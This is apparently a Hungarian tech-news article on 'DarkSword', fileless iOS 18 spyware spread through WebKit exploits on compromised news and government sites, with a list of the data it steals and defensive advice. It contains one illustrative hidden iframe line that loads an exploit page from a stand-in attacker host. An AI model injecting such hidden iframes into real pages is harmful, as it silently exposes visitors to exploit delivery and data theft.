Menü

HIREK_TECH V2.0 // SYSTEM ONLINE

DarkSword: Fájlmentes kémprogram tizedeli a frissítetlen iPhone-okat

Techie
Techie ELLENŐRIZTE: p3t3r
DÁTUM: 2026. Már 19.
● 3 PERC OLVASÁS
DarkSword: Fájlmentes kémprogram tizedeli a frissítetlen iPhone-okat

A Google és biztonsági kutatók egy új, DarkSword nevű kifinomult kémprogramot azonosítottak, amely böngészőalapú exploitokon keresztül kompromittálja az iOS 18-at futtató eszközöket.

Az okostelefonok elleni célzott támadások világa szintet lépett. Míg korábban a Pegasushoz hasonló kémeszközöket szinte kizárólag állami szereplők használták szűk célpontcsoportok ellen, a most azonosított DarkSword kampány a tömeges fertőzésre optimalizált „watering hole” (itatóhely) taktikát alkalmazza. A Google Threat Analysis Group (TAG), a Lookout és az iVerify közös jelentése szerint a kártevő több százmillió eszközt veszélyeztethet világszerte.

Kép leírása

A láthatatlan penge: Fájlmentes architektúra

A DarkSword technikai értelemben vett legérdekesebb jellemzője a fileless (fájlmentes) működési mód. A hagyományos kártevőkkel ellentétben, amelyek binárisokat írnak a háttértárra, a DarkSword kizárólag a rendszermemóriában (RAM) létezik, és legitim operációs rendszer folyamatokat (process) térít el a saját céljaira.

Ez a megközelítés drasztikusan megnehezíti a detektálást, mivel:
- Nincsenek gyanús fájlok a fájlrendszerben.
- A kártevő a feladat elvégzése (adatlopás) után egyszerűen törli magát a memóriából, nem hagyva maga után digitális lábnyomot.
- Kihasználja az iOS belső sandbox mechanizmusait, de ahelyett, hogy brute-force módszerrel törne át rajtuk, a rendszer saját API-jait használja az adatok eléréséhez.

A fertőzési vektor: Malicious Iframe

A támadás nem igényel felhasználói interakciót a weboldal megnyitásán túl (zero-click jellegű beágyazás). A kutatók több tucat kompromittált ukrán híroldalt és kormányzati portált azonosítottak, amelyekbe a támadók kártékony <iframe> elemeket injektáltak. Amint egy sebezhető iPhone-ról megnyitják az oldalt, az exploit lánc automatikusan lefut.

<!-- Koncepcionális példa a kártékony iframe beágyazásra -->
<iframe src="https://evil-command-server.com/exploit.html" style="display:none; visibility:hidden;"></iframe>

Az exploit lánc kifejezetten a Safari böngészőmotorjának (WebKit) sebezhetőségeit célozza meg, hogy távoli kódvégrehajtást (RCE) érjen el, majd eszkalálja a jogosultságokat a kernel szintjéig.

Célkeresztben az iOS 18

A DarkSword kampány precízen meghatározott szoftverkörnyezetet céloz. Bár az Apple a legújabb frissítéseiben már foltozta a kritikus réseket, a statisztikák szerint a felhasználók jelentős része (kb. 24%) még mindig elavult verziókat futtat.

Specifikáció Részletek
Érintett verziók iOS 18.4 – iOS 18.6.2
Becsült kitettség 220 – 270 millió eszköz
Támadási vektor WebKit exploit (Safari / In-app browser)
Adatlopási profil Üzenetek (iMessage, WhatsApp, Telegram), Fotók, Kriptotárcák, Egészségügyi adatok
Kapcsolódó eszközök Coruna toolkit

Mérnöki hanyagság a támadói oldalon

Érdekes módon a DarkSword felfedezését a támadók – feltételezhetően orosz állami kötődésű csoportok – súlyos biztonsági hibája segítette elő. A kutatók megtalálták a kártevő teljes forráskódját az egyik parancsnoki (C2) szerveren, amely ráadásul bőséges, angol nyelvű kommentárokkal volt ellátva. Ez a „DarkSword” elnevezést is tartalmazó dokumentáció lehetővé tette a biztonsági cégek számára, hogy pontosan megértsék a kód logikáját és az exfiltrációs protokollokat.

Kép leírása

Exfiltrációs profil: Mit visz a „Sötét Kard”?

A DarkSword nem csupán kémkedésre, hanem direkt anyagi haszonszerzésre is alkalmas. A kód elemzése során kiderült, hogy a szoftver célzottan keresi a kriptovaluta-tárcák privát kulcsait és hitelesítő adatait. Emellett hozzáfér az alábbiakhoz:
- Kommunikációs naplók: iMessage, WhatsApp és Telegram adatbázisok.
- Személyes adatok: Naptárbejegyzések, jegyzetek és a Health app szenzitív adatai.
- Média: Fotók és videók exfiltrálása.
- Böngészési előzmények: Safari history és mentett jelszavak.

Konklúzió és védekezés

A DarkSword esete rávilágít arra, hogy az iOS zárt ökoszisztémája sem nyújt abszolút védelmet a kifinomult, memóriaszinten operáló támadások ellen. A fenyegetés elsősorban azokat érinti, akik elmaradtak a szoftverfrissítésekkel.

Mérnöki ajánlás:
1. Azonnali frissítés: Minden iOS 18-at futtató eszközt a legfrissebb elérhető verzióra kell frissíteni (az Apple már kiadta a javításokat).
2. Lockdown Mode: Magas kockázatú környezetben (újságírók, diplomaták, IT adminisztrátorok) javasolt az iOS „Karantén módjának” aktiválása, amely blokkolja a komplex webes technológiákat, így az exploitok többségét is.
3. Safari Safe Browsing: Ellenőrizzük, hogy a Safari biztonsági beállításai aktívak-e, mivel az Apple már feketelistára tette a Google által azonosított kártékony domaineket.

A DarkSword megjelenése jelzi: a kereskedelmi és állami kémszoftverek közötti határvonal elmosódik, és a jövőben egyre több „fájlmentes” támadásra kell számítanunk mobil platformokon is.

Tags:

#AI #iOS #Biztonság #Spyware #DarkSword #Apple #Exploit #Kiberbiztonság

Ez is érdekelhet